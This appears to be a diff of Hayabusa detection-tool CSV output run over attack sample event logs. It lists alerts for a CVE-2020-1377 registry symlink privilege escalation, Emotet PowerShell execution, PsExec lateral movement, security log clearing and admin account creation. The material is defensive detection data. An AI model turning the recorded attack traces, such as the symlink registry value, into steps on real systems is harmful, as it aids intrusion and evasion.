+2020-08-25 19:07:58.702 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.704 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.710 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:07:58.719 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.763 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.770 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.772 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.776 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.780 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:05.787 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.398 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.401 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.418 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.594 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.610 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.644 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.677 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:08:37.678 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:09:27.981 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-25 19:09:27.988 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx
+2020-08-26 14:09:28.845 +09:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx
+2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx
+2020-08-26 14:09:33.504 +09:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx
+2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.397 +09:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-08-27 20:40:56.625 +09:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx
+2020-09-02 20:47:39.499 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.570 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.823 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-02 20:47:48.842 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx
+2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 18:28:22.280 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 18:28:42.976 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:03:04.489 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:33:31.843 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:45:30.650 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:45:33.802 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:54:20.005 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 19:54:22.974 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 20:00:13.713 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 20:00:24.602 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-04 20:02:16.084 +09:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx
+2020-09-05 22:28:40.585 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:33:34.590 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:34:11.983 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
+2020-09-05 22:37:07.245 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx
